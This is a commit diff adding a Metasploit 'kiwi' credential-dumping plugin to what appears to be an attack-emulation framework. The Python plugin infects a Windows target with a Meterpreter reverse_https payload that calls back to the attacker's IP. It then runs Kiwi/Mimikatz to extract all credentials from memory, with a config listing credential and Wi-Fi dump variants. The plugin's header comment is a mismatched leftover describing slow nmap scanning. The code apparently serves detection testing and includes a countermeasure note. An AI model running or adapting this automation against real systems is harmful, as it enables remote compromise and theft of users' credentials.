Metasploit kiwi added

3 years ago · 7cd2cba6bf
parent b36416956c
commit 7cd2cba6bf
3 changed files with 63 additions and 0 deletions
--- a/plugins/default/metasploit_attacks/metasploit_kiwi_t1003/default_config.yaml
+++ b/plugins/default/metasploit_attacks/metasploit_kiwi_t1003/default_config.yaml
@ -0,0 +1,5 @@
+###
+# The kiwi command to use.
+# See: https://www.hackers-arise.com/post/2018/11/26/metasploit-basics-part-21-post-exploitation-with-mimikatz
+# Some options: creds_all, creds_kerberos, creds msv, creds_ssp, creds_tspkg, creds_wdigest, wifi_list, wifi_list_shared
+variant: creds_all
--- a/plugins/default/metasploit_attacks/metasploit_kiwi_t1003/metasploit_kiwi_t1003.py
+++ b/plugins/default/metasploit_attacks/metasploit_kiwi_t1003/metasploit_kiwi_t1003.py
@ -0,0 +1,57 @@
+#!/usr/bin/env python3
+
+# A plugin to nmap targets slow motion, to evade sensors
+
+from plugins.base.attack import AttackPlugin
+from app.metasploit import MetasploitInstant
+import socket
+
+
+class MetasploitKiwiPlugin(AttackPlugin):
+
+    # Boilerplate
+    name = "metasploit_kiwi"
+    description = "Extract credentials from memory. Kiwi is the more modern Mimikatz"
+    ttp = "t1003"
+    references = ["https://www.hackers-arise.com/post/2018/11/26/metasploit-basics-part-21-post-exploitation-with-mimikatz"]
+
+    required_files = []    # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
+
+    def __init__(self):
+        super().__init__()
+        self.plugin_path = __file__
+
+    def run(self, targets):
+        """ Run the command
+
+        @param targets: A list of targets, ip addresses will do
+        """
+
+        self.attack_logger.start_narration("Extracting user credentials from memory.")
+        res = ""
+        payload_type = "windows/x64/meterpreter/reverse_https"
+        payload_name = "babymetal.exe"
+        target = self.targets[0]
+
+        metasploit = MetasploitInstant(self.metasploit_password,
+                                       attack_logger=self.attack_logger,
+                                       attacker=self.attacker_machine_plugin,
+                                       username=self.metasploit_user)
+
+        ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
+
+        metasploit.smart_infect(target,
+                                payload=payload_type,
+                                architecture="x64",
+                                platform="windows",
+                                lhost=ip,
+                                format="exe",
+                                outfile=payload_name)
+
+        metasploit.kiwi(target,
+                        variant=self.conf['variant'],
+                        situation_description="Kiwi is the modern version of mimikatz. It is integrated into metasploit. The attacker wants to get some credentials - reading them from memory.",
+                        countermeasure="Memory access into critical processes should be monitored."
+                        )
+
+        return res
--- a/plugins/default/metasploit_attacks/metasploit_mimikatz_t1003/metasploit_mimikatz_t1003.py
+++ b/plugins/default/metasploit_attacks/metasploit_mimikatz_t1003/metasploit_mimikatz_t1003.py
@ -0,0 +1 @@
+# TODO: Implement